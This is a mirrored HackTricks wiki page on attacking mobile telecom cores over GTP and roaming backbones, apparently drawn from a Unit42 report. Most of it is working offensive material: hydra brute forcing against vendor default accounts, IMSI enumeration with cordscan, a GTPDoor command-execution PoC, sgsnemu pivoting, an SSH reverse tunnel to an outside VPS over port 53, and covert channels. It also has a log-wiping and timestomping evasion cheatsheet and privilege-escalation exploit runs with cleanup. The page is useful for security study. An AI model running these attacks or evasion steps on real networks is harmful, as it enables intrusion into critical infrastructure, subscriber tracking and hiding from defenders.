mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00

HackTricks News Bot e4cc515e35 Add content from: The Covert Operator's Playbook: Infiltration of Global Telec...

2025-07-30 01:39:09 +00:00

6.0 KiB

Raw Blame History

Telecom Network Exploitation (GTP / Roaming Environments)

Note

Mobile-core protocols (GPRS Tunnelling Protocol – GTP) often traverse semi-trusted GRX/IPX roaming backbones. Because they ride on plain UDP with almost no authentication, any foothold inside a telecom perimeter can usually reach core signalling planes directly. The following notes collect offensive tricks observed in the wild against SGSN/GGSN, PGW/SGW and other EPC nodes.

1. Recon & Initial Access

1.1 Default OSS / NE Accounts

A surprisingly large set of vendor network elements ship with hard-coded SSH/Telnet users such as root:admin, dbadmin:dbadmin, cacti:cacti, ftpuser:ftpuser, … A dedicated wordlist dramatically increases brute-force success:

hydra -L usernames.txt -P vendor_telecom_defaults.txt ssh://10.10.10.10 -t 8 -o found.txt

If the device exposes only a management VRF, pivot through a jump host first (see section «SGSN Emu Tunnel» below).

1.2 Host Discovery inside GRX/IPX

Most GRX operators still allow ICMP echo across the backbone. Combine masscan with the built-in gtpv1 UDP probes to quickly map GTP-C listeners:

masscan 10.0.0.0/8 -pU:2123 --rate 50000 --router-ip 10.0.0.254 --router-mac 00:11:22:33:44:55

2. Enumerating Subscribers – `cordscan`

The following Go tool crafts GTP-C Create PDP Context Request packets and logs the responses. Each reply reveals the current SGSN / MME serving the queried IMSI and, sometimes, the subscriber’s visited PLMN.

# Build
GOOS=linux GOARCH=amd64 go build -o cordscan ./cmd/cordscan

# Usage (typical):
./cordscan --imsi 404995112345678 --oper 40499 -w out.pcap

Key flags:

--imsi Target subscriber IMSI
--oper Home / HNI (MCC+MNC)
-w Write raw packets to pcap

Important constants inside the binary can be patched to widen scans:

pingtimeout       = 3   // seconds before giving up
pco               = 0x218080
common_tcp_ports  = "22,23,80,443,8080"

3. Code Execution over GTP – `GTPDoor`

GTPDoor is a tiny ELF service that binds UDP 2123 and parses every incoming GTP-C packet. When the payload starts with a pre-shared tag, the remainder is decrypted (AES-128-CBC) and executed via /bin/sh -c. The stdout/stderr are exfiltrated inside Echo Response messages so that no outward session is ever created.

Minimal PoC packet (Python):

import gtpc, Crypto.Cipher.AES as AES
key = b"SixteenByteKey!"
cmd = b"id;uname -a"
enc = AES.new(key, AES.MODE_CBC, iv=b"\x00"*16).encrypt(cmd.ljust(32,b"\x00"))
print(gtpc.build_echo_req(tag=b"MAG1C", blob=enc))

Detection:

any host sending unbalanced Echo Requests to SGSN IPs
GTP version flag set to 1 while message type = 1 (Echo) – deviation from spec

4. Pivoting Through the Core

4.1 `sgsnemu` + SOCKS5

OsmoGGSN ships an SGSN emulator able to establish a PDP context towards a real GGSN/PGW. Once negotiated, Linux receives a new tun0 interface reachable from the roaming peer.

sgsnemu -g 10.1.1.100 -i 10.1.1.10 -m 40499 -s 404995112345678 \
       -APN internet -c 1 -d
ip route add 172.16.0.0/12 dev tun0
microsocks -p 1080 &   # internal SOCKS proxy

With proper firewall hair-pinning, this tunnel bypasses signalling-only VLANs and lands you directly in the data plane.

4.2 SSH Reverse Tunnel over Port 53

DNS is almost always open in roaming infrastructures. Expose an internal SSH service to your VPS listening on :53 and return later from home:

ssh -f -N -R 0.0.0.0:53:127.0.0.1:22 user@vps.example.com

Check that GatewayPorts yes is enabled on the VPS.

5. Covert Channels

Channel	Transport	Decoding	Notes
ICMP – `EchoBackdoor`	ICMP Echo Req/Rep	4-byte key + 14-byte chunks (XOR)	pure passive listener, no outbound traffic
DNS – `NoDepDNS`	UDP 53	XOR (key = `funnyAndHappy`) encoded in A-record octets	watches for `*.nodep` sub-domain
GTP – `GTPDoor`	UDP 2123	AES-128-CBC blob in private IE	blends with legitimate GTP-C chatter

All implants implement watchdogs that timestomp their binaries and re-spawn if crashed.

6. Defense Evasion Cheatsheet

# Remove attacker IPs from wtmp
utmpdump /var/log/wtmp | sed '/203\.0\.113\.66/d' | utmpdump -r > /tmp/clean && mv /tmp/clean /var/log/wtmp

# Disable bash history
export HISTFILE=/dev/null

# Masquerade as kernel thread
echo 0 > /proc/$$/autogroup   # hide from top/htop
printf '\0' > /proc/$$/comm    # appears as [kworker/1]

touch -r /usr/bin/time /usr/bin/chargen   # timestomp
setenforce 0                              # disable SELinux

7. Privilege Escalation on Legacy NE

# DirtyCow – CVE-2016-5195
gcc -pthread dirty.c -o dirty && ./dirty /etc/passwd

# PwnKit – CVE-2021-4034
python3 PwnKit.py

# Sudo Baron Samedit – CVE-2021-3156
python3 exploit_userspec.py

Clean-up tip:

userdel firefart 2>/dev/null
rm -f /tmp/sh ; history -c

8. Tool Box

cordscan, GTPDoor, EchoBackdoor, NoDepDNS – custom tooling described in previous sections.
FScan : intranet TCP sweeps (fscan -p 22,80,443 10.0.0.0/24)
Responder : LLMNR/NBT-NS rogue WPAD
Microsocks + ProxyChains : lightweight SOCKS5 pivoting
FRP (≥0.37) : NAT traversal / asset bridging

Detection Ideas

Any device other than an SGSN/GGSN establishing Create PDP Context Requests.
Non-standard ports (53, 80, 443) receiving SSH handshakes from internal IPs.
Frequent Echo Requests without corresponding Echo Responses – might indicate GTPDoor beacons.
High rate of ICMP echo-reply traffic with large, non-zero identifier/sequence fields.

References

Palo Alto Unit42 – Infiltration of Global Telecom Networks
3GPP TS 29.060 – GPRS Tunnelling Protocol (v16.4.0)
3GPP TS 29.281 – GTPv2-C (v17.6.0)

6.0 KiB Raw Blame History Unescape Escape